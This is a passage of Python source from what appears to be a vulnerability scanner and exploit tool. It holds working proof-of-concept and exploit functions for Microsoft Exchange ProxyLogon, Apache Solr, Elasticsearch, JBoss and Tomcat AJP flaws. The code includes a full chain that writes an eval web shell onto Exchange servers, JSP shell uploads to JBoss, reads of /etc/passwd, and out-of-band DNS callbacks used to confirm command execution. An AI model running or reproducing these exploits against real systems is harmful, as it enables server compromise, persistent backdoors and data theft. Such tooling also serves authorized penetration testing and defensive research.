2: # MsvAvDnsDomainName domain_name = __unpack_str(av_value) elif av_id == 3: # MsvAvDnsComputerName computer_name = __unpack_str(av_value) #if r"-" in domain_name and r"-" in computer_name: return domain_name, computer_name #else: # return False def _get_email(url): try: url = get_fld(url) return url except: return "unkonw" try: self.getipport = urlparse(self.url) self.hostname = self.getipport.hostname self.port = self.getipport.port if self.port == None and r"https://" in self.url: self.port = 443 elif self.port == None and r"http://" in self.url: self.port = 80 if bool(re.search(r'\d', self.url)): try: from urllib3.contrib import pyopenssl as reqs x509 = reqs.OpenSSL.crypto.load_certificate( reqs.OpenSSL.crypto.FILETYPE_PEM, reqs.ssl.get_server_certificate( (self.hostname, self.port))) keys = reqs.get_subj_alt_name(x509)[0] for k in keys: MAIL = "administrator@" + _get_email("https://" + k) except: MAIL = "administrator@" + _get_email(self.url) else: MAIL = "administrator@" + _get_email(self.url) # Getting ComputerName and DomainName url = self.url + "/rpc/" ntlm_type1 = "TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKALpHAAAADw==" headers = {'Authorization': 'Negotiate %s' % ntlm_type1} r = requests.get(url, headers=headers, timeout=self.timeout, verify=False) # assert r.status_code == 401, "Error while getting ComputerName" auth_header = r.headers['WWW-Authenticate'] auth = re.search('Negotiate ([A-Za-z0-9/+=]+)', auth_header).group(1) domain_name, computer_name = _parse_challenge(b64decode(auth)) # print('[*] Domain Name =', domain_name) # print('[*] Computer Name =', computer_name) NAME = computer_name # get SID sid = _get_sid(self.url, NAME, MAIL) # print(sid) payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % ( MAIL.split('@')[0], sid) r = __exploit(self.url, NAME, '/ecp/proxyLogon.ecp', qs='', data=payload) session_id = r.cookies.get('ASP.NET_SessionId') canary = r.cookies.get('msExchEcpCanary') # print('[*] get ASP.NET_SessionId =', session_id) # print('[*] get msExchEcpCanary =', canary) try: extra_cookies = [ 'ASP.NET_SessionId=' + session_id, 'msExchEcpCanary=' + canary ] except: extra_cookies = [ 'ASP.NET_SessionId=' + str(session_id), 'msExchEcpCanary=' + str(canary) ] # Getting OAB information qs = urlencode({ 'schema': 'OABVirtualDirectory', 'msExchEcpCanary': canary }) r = __exploit(self.url, NAME, '/ecp/DDI/DDIService.svc/GetObject', qs=qs, data='', cookies=extra_cookies) try: identity = r.json()['d']['Output'][0]['Identity'] # print('[*] OAB Name', identity['DisplayName']) # print('[*] OAB ID ', identity['RawIdentity']) except: identity = False if NAME and sid and session_id and canary and identity: self.vul_info["vul_data"] = dump.dump_all(r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = ntlm_type1 self.vul_info[ "prt_info"] = "[file write] [email:" + MAIL + "] [sid:" + sid + "] [oab-id:" + identity[ 'RawIdentity'] + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_27065_exp(self, cmd, file, email): vul_name = "Microsoft Exchange: CVE-2021-27065" FILE_PATH = 'C:\\inetpub\\wwwroot\\aspnet_client\\' + file FILE_DATA = '<script language="JScript" runat="server">function Page_Load(){eval(Request["v"],"unsafe");}</script>' def __unpack_str(byte_string): return byte_string.decode('UTF-8').replace('\x00', '') def __unpack_int(format, data): return unpack(format, data)[0] def __exploit(url, name, path, qs='', data='', cookies=[], headers={}): cookies = list(cookies) cookies.extend([ 'X-BEResource=a]@%s:444%s?%s#~1941962753' % (name, path, qs), ]) if not headers: headers = {'Content-Type': 'application/json'} headers['Cookie'] = ';'.join(cookies) headers['msExchLogonMailbox'] = 'S-1-5-20' try: r = requests.post(url + "/ecp/y.js", headers=headers, data=data, verify=False, allow_redirects=False) return r except: return False def _get_sid(url, name, mail): payload = ''' <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"> <Request> <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> </Request> </Autodiscover> ''' % mail headers = { 'User-Agent': 'ExchangeServicesClient/0.0.0.0', 'Content-Type': 'text/xml' } r = __exploit(url, name, '/autodiscover/autodiscover.xml', qs='', data=payload, headers=headers) res = re.search('<LegacyDN>(.*?)</LegacyDN>', r.text) if res: headers = { 'X-Clientapplication': 'Outlook/15.0.4815.1002', 'X-Requestid': 'x', 'X-Requesttype': 'Connect', 'Content-Type': 'application/mapi-http', } legacyDN = res.group(1) payload = legacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00' r = __exploit(url, name, '/mapi/emsmdb/', qs='', data=payload, headers=headers) res = re.search('with SID ([S\-0-9]+) ', r.text) if res: return res.group(1) else: return False else: return False def _parse_challenge(auth): target_info_field = auth[40:48] target_info_len = __unpack_int('H', target_info_field[0:2]) target_info_offset = __unpack_int('I', target_info_field[4:8]) target_info_bytes = auth[target_info_offset:target_info_offset + target_info_len] domain_name = '' computer_name = '' info_offset = 0 while info_offset < len(target_info_bytes): av_id = __unpack_int( 'H', target_info_bytes[info_offset:info_offset + 2]) av_len = __unpack_int( 'H', target_info_bytes[info_offset + 2:info_offset + 4]) av_value = target_info_bytes[info_offset + 4:info_offset + 4 + av_len] info_offset = info_offset + 4 + av_len if av_id == 2: # MsvAvDnsDomainName domain_name = __unpack_str(av_value) elif av_id == 3: # MsvAvDnsComputerName computer_name = __unpack_str(av_value) return domain_name, computer_name def _get_email(url): try: url = get_fld(url) return url except: return "unkonw" try: MAIL = email print('[+] Test Email =', MAIL) # Getting ComputerName and DomainName url = self.url + "/rpc/" ntlm_type1 = "TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKALpHAAAADw==" headers = {'Authorization': 'Negotiate %s' % ntlm_type1} r = requests.get(url, headers=headers, timeout=self.timeout, verify=False) assert r.status_code == 401, "Error while getting ComputerName" auth_header = r.headers['WWW-Authenticate'] auth = re.search('Negotiate ([A-Za-z0-9/+=]+)', auth_header).group(1) domain_name, computer_name = _parse_challenge(b64decode(auth)) print('[*] Domain Name =', domain_name) print('[*] Computer Name =', computer_name) NAME = computer_name # get SID sid = _get_sid(self.url, NAME, MAIL) print('[*] Login sid =', sid) payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % ( MAIL.split('@')[0], sid) r = __exploit(self.url, NAME, '/ecp/proxyLogon.ecp', qs='', data=payload) session_id = r.cookies.get('ASP.NET_SessionId') canary = r.cookies.get('msExchEcpCanary') print('[*] get ASP.NET_SessionId =', session_id) print('[*] get msExchEcpCanary =', canary) try: extra_cookies = [ 'ASP.NET_SessionId=' + session_id, 'msExchEcpCanary=' + canary ] except: extra_cookies = [ 'ASP.NET_SessionId=' + str(session_id), 'msExchEcpCanary=' + str(canary) ] # Getting OAB information qs = urlencode({ 'schema': 'OABVirtualDirectory', 'msExchEcpCanary': canary }) r = __exploit(self.url, NAME, '/ecp/DDI/DDIService.svc/GetObject', qs=qs, data='', cookies=extra_cookies) try: identity = r.json()['d']['Output'][0]['Identity'] print('[*] OAB Name', identity['DisplayName']) print('[*] OAB ID ', identity['RawIdentity']) except: identity = False print('[*] Setting up webshell payload through OAB') qs = urlencode({ 'schema': 'OABVirtualDirectory', 'msExchEcpCanary': canary }) payload = json.dumps({ 'identity': { '__type': 'Identity:ECP', 'DisplayName': identity['DisplayName'], 'RawIdentity': identity['RawIdentity'] }, 'properties': { 'Parameters': { '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', 'ExternalUrl': 'http://f/' + FILE_DATA } } }) r = __exploit(self.url, NAME, '/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies) if r.status_code == 200: print('[*] Writing shell') qs = urlencode({ 'schema': 'ResetOABVirtualDirectory', 'msExchEcpCanary': canary }) payload = json.dumps({ 'identity': { '__type': 'Identity:ECP', 'DisplayName': identity['DisplayName'], 'RawIdentity': identity['RawIdentity'] }, 'properties': { 'Parameters': { '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', 'FilePathName': FILE_PATH } } }) r = __exploit(self.url, NAME, '/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies) # Set-OABVirtualDirectory print('[*] Cleaning OAB') qs = urlencode({ 'schema': 'OABVirtualDirectory', 'msExchEcpCanary': canary }) payload = json.dumps({ 'identity': { '__type': 'Identity:ECP', 'DisplayName': identity['DisplayName'], 'RawIdentity': identity['RawIdentity'] }, 'properties': { 'Parameters': { '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', 'ExternalUrl': '' } } }) r = __exploit(self.url, NAME, '/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies) up = '[+] upload webshell is ' + self.url + "/aspnet_client/" + file self.raw_data = dump.dump_all(r).decode('utf-8', 'ignore') verify.exploit_print(up, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2021_26855_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-26855" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Microsoft Exchange Server SSRF" self.vul_info["vul_numb"] = "CVE-2021-26855" self.vul_info["vul_apps"] = "Exchange" self.vul_info["vul_date"] = "2021-03-03" self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "SSRF" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证,同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF 漏洞或通过破坏合法管理员的凭据来进行身份验证。" self.vul_info["cre_date"] = "2021-03-07" self.vul_info["cre_auth"] = "zhzyker" url = self.url + "/owa/auth/x.js" dns = dns_request() cookie_local = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;" cookie_dns = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;".replace( "localhost", dns) try: headers = { "User-agent": self.ua, "Cookie": cookie_dns, "Connection": "close" } res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if dns_result(dns): self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = headers["Cookie"] self.vul_info["prt_info"] = "[ssrf] [dns] [cookie: " + headers[ "Cookie"] + "]" else: headers = { "User-agent": self.ua, "Cookie": cookie_local, "Connection": "close" } res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if res.status_code == 500 and "NegotiateSecurityContext failed with for host" in res.text: if r"TargetUnknown" in res.text and r"localhost" in res.text: self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["vul_payd"] = headers["Cookie"] self.vul_info[ "prt_info"] = "[ssrf] [maybe] [cookie: " + headers[ "Cookie"] + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def time_2021_0318_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: time-2021-03-18" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "" self.vul_info["vul_name"] = "Apache Solr Arbitrary file reading" self.vul_info["vul_numb"] = "time-2021-03-18" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2021-03-17" self.vul_info["vul_vers"] = "all" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Arbitrary file read" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Arbitrary file read" self.vul_info["cre_auth"] = "zhzyker" core_name = None url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass set_property = self.url + "/solr/" + str(core_name) + "/config" headers_json = { 'Content-Type': 'application/json', 'Connection': 'colse', 'User-Agent': self.ua } data = r'''{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}''' r = requests.post(set_property, data=data, headers=headers_json, timeout=self.timeout, verify=False) if r.status_code == 200 and r"responseHeader" in r.text: rce_url = self.url + "/solr/" + str( core_name) + "/debug/dump?param=ContentStreams" headers = { 'User-Agent': self.ua, 'Connection': 'colse', 'Content-Type': 'multipart/form-data; boundary=------------------------e602c3e1a193d599' } data = '--------------------------e602c3e1a193d599\r\n' data += 'Content-Disposition: form-data; name="stream.url"\r\n' data += '\r\n' data += 'file:///etc/passwd\r\n' data += '--------------------------e602c3e1a193d599--\r\n' req = requests.post(rce_url, data=data, headers=headers, timeout=self.timeout, verify=False) if r"root:x:0:0:root" in req.text and r"/root:/bin/bash" in req.text and r"/usr/sbin/nologin" in req.text: if r"daemon:" in req.text and req.status_code == 200: self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[file read] [os:linux] [corename: " + self.url + "/solr/" + core_name + " ]" else: data = '--------------------------e602c3e1a193d599\r\n' data += 'Content-Disposition: form-data; name="stream.url"\r\n' data += '\r\n' data += 'file:///C:windows/win.ini\r\n' data += '--------------------------e602c3e1a193d599--\r\n' req = requests.post(rce_url, data=data, headers=headers, timeout=self.timeout, verify=False) if r"app support" in req.text and r"fonts" in req.text and r"mci extensions" in req.text: if r"files" in req.text and req.status_code == 200: self.vul_info["vul_data"] = dump.dump_all( req).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[file read] [os:windows] [corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2019_0193_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace( "RECOMMAND", "whoami") self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞" self.vul_info["vul_numb"] = "CVE-2019-0193" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2019-10-16" self.vul_info["vul_vers"] = "< 8.2.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \ "在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制" self.vul_info["cre_auth"] = "zhzyker" core_name = "null" md = random_md5() cmd = "echo " + md payload = self.payload_cve_2019_0193.replace("RECOMMAND", quote(cmd, 'utf-8')) solrhost = self.hostname + ":" + str(self.port) headers = { 'Host': "" + solrhost, 'User-Agent': self.ua, 'Accept': "application/json, text/plain, */*", 'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 'Accept-Encoding': "zip, deflate", 'Referer': self.url + "/solr/", 'Content-type': "application/x-www-form-urlencoded", 'X-Requested-With': "XMLHttpRequest", 'Connection': "close" } urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(urlcore, headers=headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass urlconfig = self.url + "/solr/" + str( core_name) + "/admin/mbeans?cat=QUERY&wt=json" request = requests.get(urlconfig, headers=headers, timeout=self.timeout, verify=False) url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport" request = requests.post(url_cmd, data=payload, headers=headers, timeout=self.timeout, verify=False) if request.status_code == 200 and core_name != "null": self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "prt_info"] = "[maybe] [core name:" + url_cmd + "] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2015_1427_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Elasticsearch: CVE-2015-1427" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2015_1427.replace( "RECOMMAND", "whoami") self.vul_info["vul_name"] = "Elasticsearch 命令执行漏洞" self.vul_info["vul_numb"] = "CVE-2015-1427" self.vul_info["vul_apps"] = "Fastjson" self.vul_info["vul_date"] = "2015-01-31" self.vul_info["vul_vers"] = "< 1.3.7, < 1.4.3" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "命令执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Elasticsearch 1.3.8之前的Groovy脚本引擎和1.4.3之前的1.4.x中的Groovy脚本引擎允许远程攻击" \ "者绕过沙盒保护机制,并通过精心制作的脚本执行任意shell命令。" self.vul_info["cre_date"] = "2021-01-21" self.vul_info["cre_auth"] = "zhzyker" self.data_send_info = r'''{ "name": "cve-2015-1427" }''' md = random_md5() cmd = "echo " + md self.data_rce = self.payload_cve_2015_1427.replace("RECOMMAND", cmd) self.host = self.hostname + ":" + str(self.port) self.headers_text = { 'Host': "" + self.host, 'Accept': '*/*', 'Connection': 'close', 'Accept-Language': 'en', 'User-Agent': self.ua, 'Content-Type': 'application/text' } try: self.request = requests.post(self.url + "/website/blog/", data=self.data_send_info, headers=self.headers, timeout=self.timeout, verify=False) self.req = requests.post(self.url + "/_search?pretty", data=self.data_rce, headers=self.headers_text, timeout=self.timeout, verify=False) try: self.r = list(json.loads( self.req.text)["hits"]["hits"])[0]["fields"]["lupin"][0] except: self.r = "null" if md in self.r: self.vul_info["vul_data"] = dump.dump_all(self.req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "] " verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2017_12629_poc(self): self.threadLock.acquire() http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace( "RECOMMAND", "whoami") self.vul_info["vul_urls"] = self.url self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2017-12629" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2017-10-14" self.vul_info["vul_vers"] = "< 7.1.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法" \ "(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。" self.vul_info["cre_auth"] = "zhzyker" core_name = "null" new_core = random_md5() md = random_md5() cmd = "ping " + md + "." + self.ceye_domain payload1 = self.payload_cve_2017_12629.replace( "RECOMMAND", cmd).replace("new_core", new_core) payload2 = '[{"id": "test"}]' url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" headers_solr1 = { 'Accept': "*/*", 'User-Agent': self.ua, 'Content-Type': "application/json" } headers_solr2 = { 'Host': "localhost", 'Accept-Language': "en", 'User-Agent': self.ua, 'Connection': "close", 'Content-Type': "application/json" } try: request = requests.get(url_core, headers=headers_solr1, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass req = requests.post(self.url + "/solr/" + str(core_name) + "/config", data=payload1, headers=headers_solr1, timeout=self.timeout, verify=False) if r"xxxxxx" in self.ceye_domain: # 特征判断 if request.status_code == 200 and core_name != "null" and core_name is not None: self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info[ "prt_info"] = "[maybe] [new core:" + new_core + "] " verify.scan_print(self.vul_info) else: request = requests.post(self.url + "/solr/" + str(core_name) + "/update", data=payload2, headers=headers_solr2, timeout=self.timeout, verify=False) request = requests.get(self.ceye_api + self.ceye_token) if md in request.text: self.vul_info["vul_data"] = dump.dump_all(req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[ceye] [new core:" + new_core + "] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2010_0738_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "RedHat JBoss: CVE-2010-0738" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "JBoss JMX控制台安全验证绕过漏洞" self.vul_info["vul_numb"] = "CVE-2010-0738" self.vul_info["vul_apps"] = "JBoss" self.vul_info["vul_date"] = "2014-03-21" self.vul_info["vul_vers"] = "4.2.0 - 4.3.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "任意文件上传" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "CVE-2010-0738漏洞利用了HTTP中HEAD请求方法,绕过了对GET和POST请求的限制," \ "成功地再次利用jboss.admin -> DeploymentFileRepository -> store()方法上传文件。" self.vul_info["cre_date"] = "2021-01-28" self.vul_info["cre_auth"] = "zhzyker" http.client.HTTPConnection._http_vsn_str = 'HTTP/1.1' self.path = "/jmx-console/HtmlAdaptor" md = random_md5() self.data = md self.poc = ( "?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=" "store&argType=java.lang.String&arg0=shells.war&argType=java.lang.String&arg1=shells&argType=java" ".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + self.data + "&argType=boolean&arg4=True") self.exp = ( "?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=" "store&argType=java.lang.String&arg0=" + self.name + ".war&argType=java.lang.String&arg1=" + self.name + "&argType=java" ".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + self.jsp_webshell + "&argType=boolean&arg4=True") self.headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 'User-Agent': self.ua, "Connection": "keep-alive" } try: self.req = requests.head(self.url + self.path + self.poc, headers=self.headers, timeout=self.timeout, verify=False) self.request = requests.get(self.url + "/shells/shells.jsp", headers=self.headers, timeout=self.timeout, verify=False) self.req = requests.head(self.url + self.path + self.poc, headers=self.headers, timeout=self.timeout, verify=False) time.sleep(0.5) self.request = requests.get(self.url + "/shells/shells.jsp", headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(self.request.text, md) and self.request.status_code == 200: self.vul_info["vul_data"] = dump.dump_all(self.req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = self.poc self.vul_info[ "prt_info"] = "[jmx-console] [upload: " + self.url + "/shells/shells.jsp ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2020_1938_exp(self, file): vul_name = "Apache Shiro: CVE-2016-4437" headers = self.headers self.output_method = "ajp" self.default_port = self.port self.default_requri = '/' self.default_headers = {} self.username = None self.password = None self.getipport = urlparse(self.url) self.hostname = self.getipport.hostname self.request = "null" raw_data = ">_< Tomcat cve-2020-2019 vulnerability uses AJP protocol detection\n" \ ">_< So there is no HTTP protocol request and response" try: socket.setdefaulttimeout(self.timeout) self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.socket.connect((self.hostname, self.default_port)) self.stream = self.socket.makefile("rb", buffering=0) # PY2: bufsize=0 self.attributes = [ { 'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/'] }, { 'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', file] }, { 'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/'] }, ] method = 'GET' self.forward_request = ApacheTomcat.__prepare_ajp_forward_request( self, self.hostname, self.default_requri, method=AjpForwardRequest.REQUEST_METHODS.get(method)) if self.username is not None and self.password is not None: self.forward_request.request_headers[ 'SC_REQ_AUTHORIZATION'] = "Basic " + str( ("%s:%s" % (self.username, self.password) ).encode('base64').replace("\n" "")) for h in self.default_headers: self.forward_request.request_headers[h] = headers[h] for a in self.attributes: self.forward_request.attributes.append(a) self.responses = self.forward_request.send_and_receive( self.socket, self.stream) if len(self.responses) == 0: return None, None self.snd_hdrs_res = self.responses[0] self.data_res = self.responses[1:-1] self.request = (b"".join([d.data for d in self.data_res]).decode()) verify.exploit_print(self.request, raw_data) except socket.timeout: verify.timeout_print(vul_name) except Exception as error: verify.error_print(vul_name)
def cve_2010_1428_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "RedHat JBoss: CVE-2010-1428" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "JBoss WEB 控制台安全验证绕过漏洞" self.vul_info["vul_numb"] = "CVE-2010-1428" self.vul_info["vul_apps"] = "JBoss" self.vul_info["vul_date"] = "2010-04-19" self.vul_info["vul_vers"] = "4.2.0 - 4.3.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "任意文件上传" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "JBoss企业应用平台中存在多个非授权访问漏洞,远程用户可以绕过认证执行非授权操作或读取敏感信息。" self.vul_info["cre_date"] = "2021-01-28" self.vul_info["cre_auth"] = "zhzyker" self.path = "/web-console/Invoker" md = random_md5() cmd = "echo " + md # self.data = ":-)" bad = "20" + md try: self.req = requests.head(self.url + self.path, data=self.payload_cve_2010_1428, headers=self.headers, timeout=self.timeout, verify=False) time.sleep(0.5) self.cmd = urlencode({"ppp": cmd}) self.request = requests.get(self.url + "/jexws4/jexws4.jsp?" + self.cmd, headers=self.headers, timeout=self.timeout, verify=False) self.req = requests.head(self.url + self.path, data=self.payload_cve_2010_1428, headers=self.headers, timeout=self.timeout, verify=False) self.cmd = urlencode({"ppp": cmd}) self.request = requests.get(self.url + "/jexws4/jexws4.jsp?" + self.cmd, headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(self.request.text, md): self.vul_info["vul_data"] = dump.dump_all(self.req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = self.url + self.path self.vul_info[ "prt_info"] = "[web-console] [upload: " + self.url + "/jexws4/jexws4.jsp?ppp=whoami ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
